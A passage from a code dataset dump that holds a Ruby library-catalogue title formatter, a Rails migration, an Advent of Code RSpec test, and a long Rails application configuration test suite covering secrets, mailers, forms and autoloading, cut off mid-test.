bandangabe: bandangabe_des_werks,
allgemeine_materialbenennung: allgemeine_matieralbenennung_des_werks
})
elsif hauptsachtitel_der_überordnung && !hauptsachtitel_des_werks
[].tap do |_result|
_result << titel_factory(hauptsachtitel_der_überordnung, {
zusätze_zum_hauptsachtitel: zusätze_zum_hauptsachtitel_der_überordnung,
ausgabebezeichnung: ausgabebezeichnung_der_überordnung
})
_result << bandangabe_des_werks if bandangabe_des_werks
end
.compact
.join(" ")
end
.try(:gsub, /<<|>>/, "")
end
private
def titel_factory(hauptsachtitel, options = {})
ausgabebezeichnung = options[:ausgabebezeichnung]
bandangabe = options[:bandangabe]
zusätze_zum_hauptsachtitel = options[:zusätze_zum_hauptsachtitel]
unterreihen = source.datafields("360", ind2: "1").subfields("a").values
allgemeine_materialbenennung = options[:allgemeine_materialbenennung]
arten_des_inhalts = source.get("Arten des Inhalts").map(&:get)
erweiterte_datenträgertypen = source.get("erweiterte Datenträgertypen").map(&:get)
if hauptsachtitel
result =[]
result <<
[
hauptsachtitel,
unterreihen.select do |unterreihe|
unterreihe.split.none? do |string|
hauptsachtitel.include?(string)
end
end
]
.flatten
.compact
.join(". ")
if zusätze_zum_hauptsachtitel
result << ": #{zusätze_zum_hauptsachtitel}"
end
if ausgabebezeichnung
result << "- #{ausgabebezeichnung}"
end
if bandangabe
result << ": #{bandangabe}"
end
additions =
[
allgemeine_materialbenennung,
arten_des_inhalts,
erweiterte_datenträgertypen
]
.flatten
.compact
.uniq
.join(", ")
.presence
if additions
result << "[#{additions}]"
end
result.join(" ")
end
end
# References
# - http://www.payer.de/rakwb/rakwb00.htm
end
| 34.014493 | 134 | 0.696847 |
b99220822dfaa204c1407251aa4de0c0705ecb44 | 168 | class UpdateInUseToolsToVersion2 < ActiveRecord::Migration[5.1]
safety_assured
def change
update_view :in_use_tools, version: 2, revert_to_version: 1
end
end
| 24 | 63 | 0.785714 |
0899ebfe076e086b1e887a8e1f5f4a3e159fdadf | 884 | # frozen_string_literal: true
require './lib/day_20'
RSpec.describe 'Day 20: Jurassic Jigsaw' do
let(:test_data) do
[]
end
let(:fixture) { File.join fixtures_path, 'day_20.data' }
let(:fixture_data) { [] }
before do
File.readlines(fixture).each do |line|
fixture_data << line.chomp
end
end
context 'Examples' do
let(:test_fixture) { File.join fixtures_path, 'day_20_test.data' }
let(:model) { Day20.new test_data }
before do
File.readlines(test_fixture).each do |line|
test_data << line.chomp
end
end
it 'locates corner tiles of assembled image' do
expect(model.exercise1).to eq 20899048083289
end
end
context 'Exercises' do
let(:model) { Day20.new fixture_data }
it 'locates corner tiles of assembled image' do
expect(model.exercise1).to eq 111936085519519
end
end
end
| 21.560976 | 70 | 0.664027 |
03e38c8e5b7ebaca09abe34e14e4ee78b9d68ef7 | 79,494 | # frozen_string_literal: true
require "isolation/abstract_unit"
require "rack/test"
require "env_helpers"
require "set"
class ::MyMailInterceptor
def self.delivering_email(email); email; end
end
class ::MyOtherMailInterceptor < ::MyMailInterceptor; end
class ::MyPreviewMailInterceptor
def self.previewing_email(email); email; end
end
class ::MyOtherPreviewMailInterceptor < ::MyPreviewMailInterceptor; end
class ::MyMailObserver
def self.delivered_email(email); email; end
end
class ::MyOtherMailObserver < ::MyMailObserver; end
module ApplicationTests
class ConfigurationTest < ActiveSupport::TestCase
include ActiveSupport::Testing::Isolation
include Rack::Test::Methods
include EnvHelpers
def new_app
File.expand_path("#{app_path}/../new_app")
end
def copy_app
FileUtils.cp_r(app_path, new_app)
end
def app(env = "development")
@app ||= begin
ENV["RAILS_ENV"] = env
require "#{app_path}/config/environment"
Rails.application
ensure
ENV.delete "RAILS_ENV"
end
end
def setup
build_app
suppress_default_config
end
def teardown
teardown_app
FileUtils.rm_rf(new_app) if File.directory?(new_app)
end
def suppress_default_config
FileUtils.mv("#{app_path}/config/environments", "#{app_path}/config/__environments__")
end
def restore_default_config
FileUtils.rm_rf("#{app_path}/config/environments")
FileUtils.mv("#{app_path}/config/__environments__", "#{app_path}/config/environments")
end
test "Rails.env does not set the RAILS_ENV environment variable which would leak out into rake tasks" do
require "rails"
switch_env "RAILS_ENV", nil do
Rails.env = "development"
assert_equal "development", Rails.env
assert_nil ENV["RAILS_ENV"]
end
end
test "Rails.env falls back to development if RAILS_ENV is blank and RACK_ENV is nil" do
with_rails_env("") do
assert_equal "development", Rails.env
end
end
test "Rails.env falls back to development if RACK_ENV is blank and RAILS_ENV is nil" do
with_rack_env("") do
assert_equal "development", Rails.env
end
end
test "By default logs tags are not set in development" do
restore_default_config
with_rails_env "development" do
app "development"
assert_predicate Rails.application.config.log_tags, :blank?
end
end
test "By default logs are tagged with :request_id in production" do
restore_default_config
with_rails_env "production" do
app "production"
assert_equal [:request_id], Rails.application.config.log_tags
end
end
test "lib dir is on LOAD_PATH during config" do
app_file "lib/my_logger.rb", <<-RUBY
require "logger"
class MyLogger < ::Logger
end
RUBY
add_to_top_of_config <<-RUBY
require "my_logger"
config.logger = MyLogger.new STDOUT
RUBY
app "development"
assert_equal "MyLogger", Rails.application.config.logger.class.name
end
test "raises an error if cache does not support recyclable cache keys" do
build_app(initializers: true)
add_to_env_config "production", "config.cache_store = Class.new {}.new"
add_to_env_config "production", "config.active_record.cache_versioning = true"
error = assert_raise(RuntimeError) do
app "production"
end
assert_match(/You're using a cache/, error.message)
end
test "a renders exception on pending migration" do
add_to_config <<-RUBY
config.active_record.migration_error = :page_load
config.consider_all_requests_local = true
config.action_dispatch.show_exceptions = true
RUBY
app_file "db/migrate/20140708012246_create_user.rb", <<-RUBY
class CreateUser < ActiveRecord::Migration::Current
def change
create_table :users
end
end
RUBY
app "development"
ActiveRecord::Migrator.migrations_paths = ["#{app_path}/db/migrate"]
begin
get "/foo"
assert_equal 500, last_response.status
assert_match "ActiveRecord::PendingMigrationError", last_response.body
ensure
ActiveRecord::Migrator.migrations_paths = nil
end
end
test "Rails.groups returns available groups" do
require "rails"
Rails.env = "development"
assert_equal [:default, "development"], Rails.groups
assert_equal [:default, "development", :assets], Rails.groups(assets: [:development])
assert_equal [:default, "development", :another, :assets], Rails.groups(:another, assets: %w(development))
Rails.env = "test"
assert_equal [:default, "test"], Rails.groups(assets: [:development])
ENV["RAILS_GROUPS"] = "javascripts,stylesheets"
assert_equal [:default, "test", "javascripts", "stylesheets"], Rails.groups
end
test "Rails.application is nil until app is initialized" do
require "rails"
assert_nil Rails.application
app "development"
assert_equal AppTemplate::Application.instance, Rails.application
end
test "Rails.application responds to all instance methods" do
app "development"
assert_equal Rails.application.routes_reloader, AppTemplate::Application.routes_reloader
end
test "Rails::Application responds to paths" do
app "development"
assert_equal ["#{app_path}/app/views"], AppTemplate::Application.paths["app/views"].expanded
end
test "the application root is set correctly" do
app "development"
assert_equal Pathname.new(app_path), Rails.application.root
end
test "the application root can be seen from the application singleton" do
app "development"
assert_equal Pathname.new(app_path), AppTemplate::Application.root
end
test "the application root can be set" do
copy_app
add_to_config <<-RUBY
config.root = '#{new_app}'
RUBY
use_frameworks []
app "development"
assert_equal Pathname.new(new_app), Rails.application.root
end
test "the application root is Dir.pwd if there is no config.ru" do
File.delete("#{app_path}/config.ru")
use_frameworks []
Dir.chdir("#{app_path}") do
app "development"
assert_equal Pathname.new("#{app_path}"), Rails.application.root
end
end
test "Rails.root should be a Pathname" do
add_to_config <<-RUBY
config.root = "#{app_path}"
RUBY
app "development"
assert_instance_of Pathname, Rails.root
end
test "Rails.public_path should be a Pathname" do
add_to_config <<-RUBY
config.paths["public"] = "somewhere"
RUBY
app "development"
assert_instance_of Pathname, Rails.public_path
end
test "does not eager load controller actions in development" do
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ActionController::Base
def index;end
def show;end
end
RUBY
app "development"
assert_nil PostsController.instance_variable_get(:@action_methods)
end
test "eager loads controller actions in production" do
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ActionController::Base
def index;end
def show;end
end
RUBY
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app "production"
assert_equal %w(index show).to_set, PostsController.instance_variable_get(:@action_methods)
end
test "does not eager load mailer actions in development" do
app_file "app/mailers/posts_mailer.rb", <<-RUBY
class PostsMailer < ActionMailer::Base
def noop_email;end
end
RUBY
app "development"
assert_nil PostsMailer.instance_variable_get(:@action_methods)
end
test "eager loads mailer actions in production" do
app_file "app/mailers/posts_mailer.rb", <<-RUBY
class PostsMailer < ActionMailer::Base
def noop_email;end
end
RUBY
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app "production"
assert_equal %w(noop_email).to_set, PostsMailer.instance_variable_get(:@action_methods)
end
test "does not eager load attribute methods in development" do
app_file "app/models/post.rb", <<-RUBY
class Post < ActiveRecord::Base
end
RUBY
app_file "config/initializers/active_record.rb", <<-RUBY
ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
ActiveRecord::Migration.verbose = false
ActiveRecord::Schema.define(version: 1) do
create_table :posts do |t|
t.string :title
end
end
RUBY
app "development"
assert_not_includes Post.instance_methods, :title
end
test "does not eager load attribute methods in production when the schema cache is empty" do
app_file "app/models/post.rb", <<-RUBY
class Post < ActiveRecord::Base
end
RUBY
app_file "config/initializers/active_record.rb", <<-RUBY
ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
ActiveRecord::Migration.verbose = false
ActiveRecord::Schema.define(version: 1) do
create_table :posts do |t|
t.string :title
end
end
RUBY
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app "production"
assert_not_includes Post.instance_methods, :title
end
test "eager loads attribute methods in production when the schema cache is populated" do
app_file "app/models/post.rb", <<-RUBY
class Post < ActiveRecord::Base
end
RUBY
app_file "config/initializers/active_record.rb", <<-RUBY
ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
ActiveRecord::Migration.verbose = false
ActiveRecord::Schema.define(version: 1) do
create_table :posts do |t|
t.string :title
end
end
RUBY
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app_file "config/initializers/schema_cache.rb", <<-RUBY
ActiveRecord::Base.connection.schema_cache.add("posts")
RUBY
app "production"
assert_includes Post.instance_methods, :title
end
test "does not attempt to eager load attribute methods for models that aren't connected" do
app_file "app/models/post.rb", <<-RUBY
class Post < ActiveRecord::Base
end
RUBY
app_file "config/initializers/active_record.rb", <<-RUBY
ActiveRecord::Base.establish_connection(adapter: "sqlite3", database: ":memory:")
ActiveRecord::Migration.verbose = false
ActiveRecord::Schema.define(version: 1) do
create_table :posts do |t|
t.string :title
end
end
RUBY
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app_file "app/models/comment.rb", <<-RUBY
class Comment < ActiveRecord::Base
establish_connection(adapter: "mysql2", database: "does_not_exist")
end
RUBY
assert_nothing_raised do
app "production"
end
end
test "initialize an eager loaded, cache classes app" do
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
app "development"
assert_equal :require, ActiveSupport::Dependencies.mechanism
end
test "application is always added to eager_load namespaces" do
app "development"
assert_includes Rails.application.config.eager_load_namespaces, AppTemplate::Application
end
test "the application can be eager loaded even when there are no frameworks" do
FileUtils.rm_rf("#{app_path}/app/jobs/application_job.rb")
FileUtils.rm_rf("#{app_path}/app/models/application_record.rb")
FileUtils.rm_rf("#{app_path}/app/mailers/application_mailer.rb")
FileUtils.rm_rf("#{app_path}/config/environments")
add_to_config <<-RUBY
config.eager_load = true
config.cache_classes = true
RUBY
use_frameworks []
assert_nothing_raised do
app "development"
end
end
test "filter_parameters should be able to set via config.filter_parameters" do
add_to_config <<-RUBY
config.filter_parameters += [ :foo, 'bar', lambda { |key, value|
value = value.reverse if /baz/.match?(key)
}]
RUBY
assert_nothing_raised do
app "development"
end
end
test "filter_parameters should be able to set via config.filter_parameters in an initializer" do
app_file "config/initializers/filter_parameters_logging.rb", <<-RUBY
Rails.application.config.filter_parameters += [ :password, :foo, 'bar' ]
RUBY
app "development"
assert_equal [:password, :foo, "bar"], Rails.application.env_config["action_dispatch.parameter_filter"]
end
test "config.to_prepare is forwarded to ActionDispatch" do
$prepared = false
add_to_config <<-RUBY
config.to_prepare do
$prepared = true
end
RUBY
assert_not $prepared
app "development"
get "/"
assert $prepared
end
def assert_utf8
assert_equal Encoding::UTF_8, Encoding.default_external
assert_equal Encoding::UTF_8, Encoding.default_internal
end
test "skipping config.encoding still results in 'utf-8' as the default" do
app "development"
assert_utf8
end
test "config.encoding sets the default encoding" do
add_to_config <<-RUBY
config.encoding = "utf-8"
RUBY
app "development"
assert_utf8
end
test "config.paths.public sets Rails.public_path" do
add_to_config <<-RUBY
config.paths["public"] = "somewhere"
RUBY
app "development"
assert_equal Pathname.new(app_path).join("somewhere"), Rails.public_path
end
test "In production mode, config.public_file_server.enabled is off by default" do
restore_default_config
with_rails_env "production" do
app "production"
assert_not app.config.public_file_server.enabled
end
end
test "In production mode, config.public_file_server.enabled is enabled when RAILS_SERVE_STATIC_FILES is set" do
restore_default_config
with_rails_env "production" do
switch_env "RAILS_SERVE_STATIC_FILES", "1" do
app "production"
assert app.config.public_file_server.enabled
end
end
end
test "In production mode, STDOUT logging is enabled when RAILS_LOG_TO_STDOUT is set" do
restore_default_config
with_rails_env "production" do
switch_env "RAILS_LOG_TO_STDOUT", "1" do
app "production"
assert ActiveSupport::Logger.logger_outputs_to?(app.config.logger, STDOUT)
end
end
end
test "In production mode, config.public_file_server.enabled is disabled when RAILS_SERVE_STATIC_FILES is blank" do
restore_default_config
with_rails_env "production" do
switch_env "RAILS_SERVE_STATIC_FILES", " " do
app "production"
assert_not app.config.public_file_server.enabled
end
end
end
test "Use key_generator when secret_key_base is set" do
make_basic_app do |application|
application.secrets.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33"
application.config.session_store :disabled
end
class ::OmgController < ActionController::Base
def index
cookies.signed[:some_key] = "some_value"
render plain: cookies[:some_key]
end
end
get "/"
secret = app.key_generator.generate_key("signed cookie")
verifier = ActiveSupport::MessageVerifier.new(secret)
assert_equal "some_value", verifier.verify(last_response.body)
end
test "application verifier can be used in the entire application" do
make_basic_app do |application|
application.secrets.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33"
application.config.session_store :disabled
end
message = app.message_verifier(:sensitive_value).generate("some_value")
assert_equal "some_value", Rails.application.message_verifier(:sensitive_value).verify(message)
secret = app.key_generator.generate_key("sensitive_value")
verifier = ActiveSupport::MessageVerifier.new(secret)
assert_equal "some_value", verifier.verify(message)
end
test "application will generate secret_key_base in tmp file if blank in development" do
app_file "config/initializers/secret_token.rb", <<-RUBY
Rails.application.credentials.secret_key_base = nil
RUBY
# For test that works even if tmp dir does not exist.
Dir.chdir(app_path) { FileUtils.remove_dir("tmp") }
app "development"
assert_not_nil app.secrets.secret_key_base
assert File.exist?(app_path("tmp/development_secret.txt"))
end
test "application will not generate secret_key_base in tmp file if blank in production" do
app_file "config/initializers/secret_token.rb", <<-RUBY
Rails.application.credentials.secret_key_base = nil
RUBY
assert_raises ArgumentError do
app "production"
end
end
test "raises when secret_key_base is blank" do
app_file "config/initializers/secret_token.rb", <<-RUBY
Rails.application.credentials.secret_key_base = nil
RUBY
error = assert_raise(ArgumentError) do
app "production"
end
assert_match(/Missing `secret_key_base`./, error.message)
end
test "raise when secret_key_base is not a type of string" do
add_to_config <<-RUBY
Rails.application.credentials.secret_key_base = 123
RUBY
assert_raise(ArgumentError) do
app "production"
end
end
test "application verifier can build different verifiers" do
make_basic_app do |application|
application.config.session_store :disabled
end
default_verifier = app.message_verifier(:sensitive_value)
text_verifier = app.message_verifier(:text)
message = text_verifier.generate("some_value")
assert_equal "some_value", text_verifier.verify(message)
assert_raises ActiveSupport::MessageVerifier::InvalidSignature do
default_verifier.verify(message)
end
assert_equal default_verifier.object_id, app.message_verifier(:sensitive_value).object_id
assert_not_equal default_verifier.object_id, text_verifier.object_id
end
test "secrets.secret_key_base is used when config/secrets.yml is present" do
app_file "config/secrets.yml", <<-YAML
development:
secret_key_base: 3b7cd727ee24e8444053437c36cc66c3
YAML
app "development"
assert_equal "3b7cd727ee24e8444053437c36cc66c3", app.secrets.secret_key_base
assert_equal "3b7cd727ee24e8444053437c36cc66c3", app.secret_key_base
end
test "secret_key_base is copied from config to secrets when not set" do
remove_file "config/secrets.yml"
app_file "config/initializers/secret_token.rb", <<-RUBY
Rails.application.config.secret_key_base = "3b7cd727ee24e8444053437c36cc66c3"
RUBY
app "development"
assert_equal "3b7cd727ee24e8444053437c36cc66c3", app.secrets.secret_key_base
end
test "custom secrets saved in config/secrets.yml are loaded in app secrets" do
app_file "config/secrets.yml", <<-YAML
development:
secret_key_base: 3b7cd727ee24e8444053437c36cc66c3
aws_access_key_id: myamazonaccesskeyid
aws_secret_access_key: myamazonsecretaccesskey
YAML
app "development"
assert_equal "myamazonaccesskeyid", app.secrets.aws_access_key_id
assert_equal "myamazonsecretaccesskey", app.secrets.aws_secret_access_key
end
test "shared secrets saved in config/secrets.yml are loaded in app secrets" do
app_file "config/secrets.yml", <<-YAML
shared:
api_key: 3b7cd727
YAML
app "development"
assert_equal "3b7cd727", app.secrets.api_key
end
test "shared secrets will yield to environment specific secrets" do
app_file "config/secrets.yml", <<-YAML
shared:
api_key: 3b7cd727
development:
api_key: abc12345
YAML
app "development"
assert_equal "abc12345", app.secrets.api_key
end
test "blank config/secrets.yml does not crash the loading process" do
app_file "config/secrets.yml", <<-YAML
YAML
app "development"
assert_nil app.secrets.not_defined
end
test "config.secret_key_base over-writes a blank secrets.secret_key_base" do
app_file "config/initializers/secret_token.rb", <<-RUBY
Rails.application.config.secret_key_base = "iaminallyoursecretkeybase"
RUBY
app_file "config/secrets.yml", <<-YAML
development:
secret_key_base:
YAML
app "development"
assert_equal "iaminallyoursecretkeybase", app.secrets.secret_key_base
end
test "that nested keys are symbolized the same as parents for hashes more than one level deep" do
app_file "config/secrets.yml", <<-YAML
development:
smtp_settings:
address: "smtp.example.com"
user_name: "[email protected]"
password: "697361616320736c6f616e2028656c6f7265737429"
YAML
app "development"
assert_equal "697361616320736c6f616e2028656c6f7265737429", app.secrets.smtp_settings[:password]
end
test "require_master_key aborts app boot when missing key" do
skip "can't run without fork" unless Process.respond_to?(:fork)
remove_file "config/master.key"
add_to_config "config.require_master_key = true"
error = capture(:stderr) do
Process.wait(Process.fork { app "development" })
end
assert_equal 1, $?.exitstatus
assert_match(/Missing.*RAILS_MASTER_KEY/, error)
end
test "credentials does not raise error when require_master_key is false and master key does not exist" do
remove_file "config/master.key"
add_to_config "config.require_master_key = false"
app "development"
assert_not app.credentials.secret_key_base
end
test "protect from forgery is the default in a new app" do
make_basic_app
class ::OmgController < ActionController::Base
def index
render inline: "<%= csrf_meta_tags %>"
end
end
get "/"
assert_match(/csrf\-param/, last_response.body)
end
test "default form builder specified as a string" do
app_file "config/initializers/form_builder.rb", <<-RUBY
class CustomFormBuilder < ActionView::Helpers::FormBuilder
def text_field(attribute, *args)
label(attribute) + super(attribute, *args)
end
end
Rails.configuration.action_view.default_form_builder = "CustomFormBuilder"
RUBY
app_file "app/models/post.rb", <<-RUBY
class Post
include ActiveModel::Model
attr_accessor :name
end
RUBY
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ApplicationController
def index
render inline: "<%= begin; form_for(Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
RUBY
app "development"
get "/posts"
assert_match(/label/, last_response.body)
end
test "form_with can be configured with form_with_generates_ids" do
app_file "config/initializers/form_builder.rb", <<-RUBY
Rails.configuration.action_view.form_with_generates_ids = false
RUBY
app_file "app/models/post.rb", <<-RUBY
class Post
include ActiveModel::Model
attr_accessor :name
end
RUBY
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ApplicationController
def index
render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
RUBY
app "development"
get "/posts"
assert_no_match(/id=('|")post_name('|")/, last_response.body)
end
test "form_with outputs ids by default" do
app_file "app/models/post.rb", <<-RUBY
class Post
include ActiveModel::Model
attr_accessor :name
end
RUBY
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ApplicationController
def index
render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
RUBY
app "development"
get "/posts"
assert_match(/id=('|")post_name('|")/, last_response.body)
end
test "form_with can be configured with form_with_generates_remote_forms" do
app_file "config/initializers/form_builder.rb", <<-RUBY
Rails.configuration.action_view.form_with_generates_remote_forms = false
RUBY
app_file "app/models/post.rb", <<-RUBY
class Post
include ActiveModel::Model
attr_accessor :name
end
RUBY
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ApplicationController
def index
render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
RUBY
app "development"
get "/posts"
assert_no_match(/data-remote/, last_response.body)
end
test "form_with generates remote forms by default" do
app_file "app/models/post.rb", <<-RUBY
class Post
include ActiveModel::Model
attr_accessor :name
end
RUBY
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ApplicationController
def index
render inline: "<%= begin; form_with(model: Post.new) {|f| f.text_field(:name)}; rescue => e; e.to_s; end %>"
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
RUBY
app "development"
get "/posts"
assert_match(/data-remote/, last_response.body)
end
test "default method for update can be changed" do
app_file "app/models/post.rb", <<-RUBY
class Post
include ActiveModel::Model
def to_key; [1]; end
def persisted?; true; end
end
RUBY
token = "cf50faa3fe97702ca1ae"
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ApplicationController
def show
render inline: "<%= begin; form_for(Post.new) {}; rescue => e; e.to_s; end %>"
end
def update
render plain: "update"
end
private
def form_authenticity_token(**); token; end # stub the authenticity token
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
RUBY
app "development"
params = { authenticity_token: token }
get "/posts/1"
assert_match(/patch/, last_response.body)
patch "/posts/1", params
assert_match(/update/, last_response.body)
patch "/posts/1", params
assert_equal 200, last_response.status
put "/posts/1", params
assert_match(/update/, last_response.body)
put "/posts/1", params
assert_equal 200, last_response.status
end
test "request forgery token param can be changed" do
make_basic_app do |application|
application.config.action_controller.request_forgery_protection_token = "_xsrf_token_here"
end
class ::OmgController < ActionController::Base
def index
render inline: "<%= csrf_meta_tags %>"
end
end
get "/"
assert_match "_xsrf_token_here", last_response.body
end
test "sets ActionDispatch.test_app" do
make_basic_app
assert_equal Rails.application, ActionDispatch.test_app
end
test "sets ActionDispatch::Response.default_charset" do
make_basic_app do |application|
application.config.action_dispatch.default_charset = "utf-16"
end
assert_equal "utf-16", ActionDispatch::Response.default_charset
end
test "registers interceptors with ActionMailer" do
add_to_config <<-RUBY
config.action_mailer.interceptors = MyMailInterceptor
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal [::MyMailInterceptor], ::Mail.class_variable_get(:@@delivery_interceptors)
end
test "registers multiple interceptors with ActionMailer" do
add_to_config <<-RUBY
config.action_mailer.interceptors = [MyMailInterceptor, "MyOtherMailInterceptor"]
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal [::MyMailInterceptor, ::MyOtherMailInterceptor], ::Mail.class_variable_get(:@@delivery_interceptors)
end
test "registers preview interceptors with ActionMailer" do
add_to_config <<-RUBY
config.action_mailer.preview_interceptors = MyPreviewMailInterceptor
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal [ActionMailer::InlinePreviewInterceptor, ::MyPreviewMailInterceptor], ActionMailer::Base.preview_interceptors
end
test "registers multiple preview interceptors with ActionMailer" do
add_to_config <<-RUBY
config.action_mailer.preview_interceptors = [MyPreviewMailInterceptor, "MyOtherPreviewMailInterceptor"]
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal [ActionMailer::InlinePreviewInterceptor, MyPreviewMailInterceptor, MyOtherPreviewMailInterceptor], ActionMailer::Base.preview_interceptors
end
test "default preview interceptor can be removed" do
app_file "config/initializers/preview_interceptors.rb", <<-RUBY
ActionMailer::Base.preview_interceptors.delete(ActionMailer::InlinePreviewInterceptor)
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal [], ActionMailer::Base.preview_interceptors
end
test "registers observers with ActionMailer" do
add_to_config <<-RUBY
config.action_mailer.observers = MyMailObserver
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal [::MyMailObserver], ::Mail.class_variable_get(:@@delivery_notification_observers)
end
test "registers multiple observers with ActionMailer" do
add_to_config <<-RUBY
config.action_mailer.observers = [MyMailObserver, "MyOtherMailObserver"]
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal [::MyMailObserver, ::MyOtherMailObserver], ::Mail.class_variable_get(:@@delivery_notification_observers)
end
test "allows setting the queue name for the ActionMailer::MailDeliveryJob" do
add_to_config <<-RUBY
config.action_mailer.deliver_later_queue_name = 'test_default'
RUBY
app "development"
require "mail"
_ = ActionMailer::Base
assert_equal "test_default", ActionMailer::Base.class_variable_get(:@@deliver_later_queue_name)
end
test "valid timezone is setup correctly" do
add_to_config <<-RUBY
config.root = "#{app_path}"
config.time_zone = "Wellington"
RUBY
app "development"
assert_equal "Wellington", Rails.application.config.time_zone
end
test "raises when an invalid timezone is defined in the config" do
add_to_config <<-RUBY
config.root = "#{app_path}"
config.time_zone = "That big hill over yonder hill"
RUBY
assert_raise(ArgumentError) do
app "development"
end
end
test "valid beginning of week is setup correctly" do
add_to_config <<-RUBY
config.root = "#{app_path}"
config.beginning_of_week = :wednesday
RUBY
app "development"
assert_equal :wednesday, Rails.application.config.beginning_of_week
end
test "raises when an invalid beginning of week is defined in the config" do
add_to_config <<-RUBY
config.root = "#{app_path}"
config.beginning_of_week = :invalid
RUBY
assert_raise(ArgumentError) do
app "development"
end
end
test "autoloaders" do
app "development"
config = Rails.application.config
assert Rails.autoloaders.zeitwerk_enabled?
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.main
assert_equal "rails.main", Rails.autoloaders.main.tag
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.once
assert_equal "rails.once", Rails.autoloaders.once.tag
assert_equal [Rails.autoloaders.main, Rails.autoloaders.once], Rails.autoloaders.to_a
assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.main.inflector
assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.once.inflector
config.autoloader = :classic
assert_not Rails.autoloaders.zeitwerk_enabled?
assert_nil Rails.autoloaders.main
assert_nil Rails.autoloaders.once
assert_equal 0, Rails.autoloaders.count
config.autoloader = :zeitwerk
assert Rails.autoloaders.zeitwerk_enabled?
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.main
assert_equal "rails.main", Rails.autoloaders.main.tag
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.once
assert_equal "rails.once", Rails.autoloaders.once.tag
assert_equal [Rails.autoloaders.main, Rails.autoloaders.once], Rails.autoloaders.to_a
assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.main.inflector
assert_equal ActiveSupport::Dependencies::ZeitwerkIntegration::Inflector, Rails.autoloaders.once.inflector
assert_raises(ArgumentError) { config.autoloader = :unknown }
end
test "config.action_view.cache_template_loading with cache_classes default" do
add_to_config "config.cache_classes = true"
app "development"
require "action_view/base"
assert_equal true, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading without cache_classes default" do
add_to_config "config.cache_classes = false"
app "development"
require "action_view/base"
assert_equal false, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading = false" do
add_to_config <<-RUBY
config.cache_classes = true
config.action_view.cache_template_loading = false
RUBY
app "development"
require "action_view/base"
assert_equal false, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading = true" do
add_to_config <<-RUBY
config.cache_classes = false
config.action_view.cache_template_loading = true
RUBY
app "development"
require "action_view/base"
assert_equal true, ActionView::Resolver.caching?
end
test "config.action_view.cache_template_loading with cache_classes in an environment" do
build_app(initializers: true)
add_to_env_config "development", "config.cache_classes = false"
# These requires are to emulate an engine loading Action View before the application
require "action_view"
require "action_view/railtie"
require "action_view/base"
app "development"
assert_equal false, ActionView::Resolver.caching?
end
test "config.action_dispatch.show_exceptions is sent in env" do
make_basic_app do |application|
application.config.action_dispatch.show_exceptions = true
end
class ::OmgController < ActionController::Base
def index
render plain: request.env["action_dispatch.show_exceptions"]
end
end
get "/"
assert_equal "true", last_response.body
end
test "config.action_controller.wrap_parameters is set in ActionController::Base" do
app_file "config/initializers/wrap_parameters.rb", <<-RUBY
ActionController::Base.wrap_parameters format: [:json]
RUBY
app_file "app/models/post.rb", <<-RUBY
class Post
def self.attribute_names
%w(title)
end
end
RUBY
app_file "app/controllers/application_controller.rb", <<-RUBY
class ApplicationController < ActionController::Base
protect_from_forgery with: :reset_session # as we are testing API here
end
RUBY
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ApplicationController
def create
render plain: params[:post].inspect
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
RUBY
app "development"
post "/posts.json", '{ "title": "foo", "name": "bar" }', "CONTENT_TYPE" => "application/json"
assert_equal '<ActionController::Parameters {"title"=>"foo"} permitted: false>', last_response.body
end
test "config.action_controller.permit_all_parameters = true" do
